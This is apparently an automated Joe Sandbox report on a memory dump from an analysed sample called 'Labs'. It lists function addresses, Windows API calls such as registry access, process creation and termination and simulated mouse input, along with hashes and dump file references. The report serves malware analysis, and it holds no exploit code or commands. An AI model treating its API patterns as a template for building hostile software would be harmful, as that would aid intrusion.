Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
Instruction ID: e76f06c3c6270ca5cb81658faec6e4916630ed6e19ecd53e6a429b89fbccd140
Opcode Fuzzy Hash: 74d3506f3f9be15277b6e553b41b4ccde06ad00b167c04ec99902dea3833143e
Instruction Fuzzy Hash: 0DE01A70690741AFEF911B70EC4DB293AA9B755B06F604824B911D51F4CBF940858F00

Function 0079428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007941A8), ref: 007942A8
GetProcAddress.KERNEL32(00000000), ref: 007942AF
EncodePointer.KERNEL32(00000000), ref: 007942BA
DecodePointer.KERNEL32(007941A8), ref: 007942D5

Strings

combase.dll, xrefs: 007942A3
RoUninitialize, xrefs: 00794297

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
Instruction ID: 73c10ee5443920a48a4df86cb26a2c73426d2166b8fac0fb237be9eaab7a1f80
Opcode Fuzzy Hash: 4dce3c010445c160c912bc076f0c97e7aa75ed326e3d70dbb35f718144b19438
Instruction Fuzzy Hash: CEE0E270AA0B00EFEF929F60ED0DF493AA8BB84B42F50491AF401E52F0CBB84604DF10

Function 0077218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 007721B8
GetWindowRect.USER32(?,?), ref: 007721F9
ScreenToClient.USER32(?,?), ref: 00772221
GetClientRect.USER32(?,?), ref: 00772350
GetWindowRect.USER32(?,?), ref: 00772369

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
Instruction ID: 5827d3ede4af3e7a94b387d5f6fd704febe272e12fa4b9a441f2f1005f3516c1
Opcode Fuzzy Hash: 71a73744a5983a8f510bbac48105732f3db591594bf4ab43c75fee4cc763c2e6
Instruction Fuzzy Hash: ADB17C39900249DBDF10CFA8C8807EDB7B1FF48350F14C129ED69AB256DB38AA51CB64

Function 007D6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007D6BC6
_memmove.LIBCMT ref: 007D6B01

Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC

_memmove.LIBCMT ref: 007D6B74
_memmove.LIBCMT ref: 007D6C5B
_memmove.LIBCMT ref: 007D6C74
_memmove.LIBCMT ref: 007D6C90

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 51ab40fe22c4e2fb00421c61a35dbb705e6c79181faffba7ee17a0808551edfc
Instruction ID: 1254f15c8b12d485f667728a52ee4906b7ac48ca30353520c9300c192f5b4349
Opcode Fuzzy Hash: 51ab40fe22c4e2fb00421c61a35dbb705e6c79181faffba7ee17a0808551edfc
Instruction Fuzzy Hash: DB61D27010025ADBCF11EF64CC89EFE37B8AF05344F44855AF8595B292DB39AD15CB60

Function 007F0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77

Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007F095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007F0980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007F09A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007F09EC
RegCloseKey.ADVAPI32(00000000), ref: 007F09F9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 53e37409855f936aa4017490f05efe465f5b19d2c0ce04ee7f2a7ec9d4c37e5e
Instruction ID: bede39900993e2392fba508e53c1539aeda91d857ee2b7110873f00f5628ad01
Opcode Fuzzy Hash: 53e37409855f936aa4017490f05efe465f5b19d2c0ce04ee7f2a7ec9d4c37e5e
Instruction Fuzzy Hash: D0516A31208204EFD714EF64C889E6EBBE9FF84314F44491DF595872A2EB79E905CB92

Function 007F5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007F5E38
GetMenuItemCount.USER32(00000000), ref: 007F5E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F5E97
GetMenuItemID.USER32(?,?), ref: 007F5F06
GetSubMenu.USER32(?,?), ref: 007F5F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 007F5F65

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: ba7153c0abb76a2dbb39f4ad98f73f1ebeb96306f838d1826fa4ba612d8a8819
Instruction ID: abe60b418d55f0ab2690125cca28c1bf3d042596cfa39b9bced4df210a03893e
Opcode Fuzzy Hash: ba7153c0abb76a2dbb39f4ad98f73f1ebeb96306f838d1826fa4ba612d8a8819
Instruction Fuzzy Hash: D6516C75A01A19EFCF11EF64C845ABEB7B5EF48320F104099EA15BB351CB39AE418B91

Function 007CF688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 007CF6A2
VariantClear.OLEAUT32(00000013), ref: 007CF714
VariantClear.OLEAUT32(00000000), ref: 007CF76F
_memmove.LIBCMT ref: 007CF799
VariantClear.OLEAUT32(?), ref: 007CF7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007CF814

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
Instruction ID: 195a592a906f3587658c03644e44daff33477804b57effce5b09548b49d1d662
Opcode Fuzzy Hash: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
Instruction Fuzzy Hash: 925145B5A00209EFCB14CF58C884EAAB7B9FF48314B15856EE959DB301E734E911CFA0

Function 007D29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007D29FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A4A
IsMenu.USER32(00000000), ref: 007D2A6A
CreatePopupMenu.USER32 ref: 007D2A9E
GetMenuItemCount.USER32(000000FF), ref: 007D2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D2B2D

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
Instruction ID: 03a9a3c86763343e53206d159f83420273dab05981b7a6e2cb3c102761373366
Opcode Fuzzy Hash: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
Instruction Fuzzy Hash: EC519070600249DBCF25CF68D888BAEBBF4EF64318F14415BE8119B392E7B49947CB51

Function 00771B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 00771B76
GetWindowRect.USER32(?,?), ref: 00771BDA
ScreenToClient.USER32(?,?), ref: 00771BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00771C08
EndPaint.USER32(?,?), ref: 00771C52

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
Instruction ID: e90ce0139bb70356ced26a1138882f408d5607f9f538fd5b5af0a363ba9b8fd9
Opcode Fuzzy Hash: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
Instruction Fuzzy Hash: E641D7701043049FDB21DF68CC88FB67BE8FB95360F144669FA69872A2C735D805DB61

Function 007FBD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008377B0,00000000,01204CE8,?,?,008377B0,?,007FBC1A,?,?), ref: 007FBD84
EnableWindow.USER32(?,00000000), ref: 007FBDA8
ShowWindow.USER32(008377B0,00000000,01204CE8,?,?,008377B0,?,007FBC1A,?,?), ref: 007FBE08
ShowWindow.USER32(?,00000004,?,007FBC1A,?,?), ref: 007FBE1A
EnableWindow.USER32(?,00000001), ref: 007FBE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 007FBE61

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 137564108c8492962a1d5b3e1b4c8de325c7f1e5e5d0cd1d0f89a0f6a25a42a9
Instruction ID: 5491d2de2835ff8de5ebdc56cd7096a704b4cbd1a487374b0bdbd23f6fe06a40
Opcode Fuzzy Hash: 137564108c8492962a1d5b3e1b4c8de325c7f1e5e5d0cd1d0f89a0f6a25a42a9
Instruction Fuzzy Hash: 97414D34704148EFDB22CF28C489BE47BE5BF05315F1841A9EB588F3A2CB36A845CB51

Function 007E7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,007E550C,?,?,00000000,00000001), ref: 007E7796

Part of subcall function 007E406C: GetWindowRect.USER32(?,?), ref: 007E407F

GetDesktopWindow.USER32 ref: 007E77C0
GetWindowRect.USER32(00000000), ref: 007E77C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E77F9

Part of subcall function 007D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877

GetCursorPos.USER32(?), ref: 007E7825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E7883

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
Instruction ID: f6d863f5de0f9353ae632654df5b20a0ffd05f03ed3f5836dcbca7ce2dafe2cf
Opcode Fuzzy Hash: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
Instruction Fuzzy Hash: 2731D072509345ABD724DF54CC49F9BB7EAFF88314F00091AF589A7181CB35E908CBA2

Function 007C9431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
Part of subcall function 007C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
Part of subcall function 007C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
Part of subcall function 007C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14

GetLengthSid.ADVAPI32(?,00000000,007C904D), ref: 007C9482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C948E
HeapAlloc.KERNEL32(00000000), ref: 007C9495
CopySid.ADVAPI32(00000000,00000000,?), ref: 007C94AE
GetProcessHeap.KERNEL32(00000000,00000000,007C904D), ref: 007C94C2
HeapFree.KERNEL32(00000000), ref: 007C94C9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
Instruction ID: 98551a5dc50a0d2c2469251153e97e1b2598828895ab043686800aaad71b1d74
Opcode Fuzzy Hash: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
Instruction Fuzzy Hash: BF117C72601A04EFDB989FA4CC0DFAF7BB9FB45316F10815CE94597210D73A9A41CB60

Function 007C91CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C9200
OpenProcessToken.ADVAPI32(00000000), ref: 007C9207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C9216
CloseHandle.KERNEL32(00000004), ref: 007C9221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C9250
DestroyEnvironmentBlock.USERENV(00000000), ref: 007C9264

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
Instruction ID: 40fa40429c0c83fa7adb81385bdb9f637665f50a28dc5656554a14b595d2ba89
Opcode Fuzzy Hash: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
Instruction Fuzzy Hash: BA11477250120EABDB428F94ED4DFDA7BA9FB08705F084018FA44A2160D67A9D60EB60

Function 007CC329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 007CC34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 007CC35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CC366
ReleaseDC.USER32(00000000,00000000), ref: 007CC36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CC385
MulDiv.KERNEL32(000009EC,?,?), ref: 007CC397

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
Instruction ID: 74847ffe22bdffe2fe57299b0f89321bb0649f174872479d8cf3c986bd7d2452
Opcode Fuzzy Hash: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
Instruction Fuzzy Hash: 16014475E00718BBEF509BA59C49F5EBFB8EF58751F004069FA08AB280DA719D10CFA1

Function 007FC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007FC57C
LineTo.GDI32(00000000,00000003,?), ref: 007FC590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC59E
LineTo.GDI32(00000000,00000000,?), ref: 007FC5AE
EndPath.GDI32(00000000), ref: 007FC5BE
StrokePath.GDI32(00000000), ref: 007FC5CE

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
Instruction ID: c4dd12537f8e33327ef34ecece6d883ab7b9a776961c2181bd87884d6c7f210c
Opcode Fuzzy Hash: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
Instruction Fuzzy Hash: E311DB7600410DBFDF129F94DC88FAA7FADFB08354F148461BA185A160D771AE55DFA0

Function 007907BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_770000_Labs.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
Instruction ID: bb64d7764dcb9969b405d931db7b892506f508fbba79cb7a9c71b77e7a0dfde4
Opcode Fuzzy Hash: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
Instruction Fuzzy Hash: D3016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CFE5

Function 007D59A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D59B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D59CA
GetWindowThreadProcessId.USER32(?,?), ref: 007D59D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F9

Memory Dump Source

Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true

Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
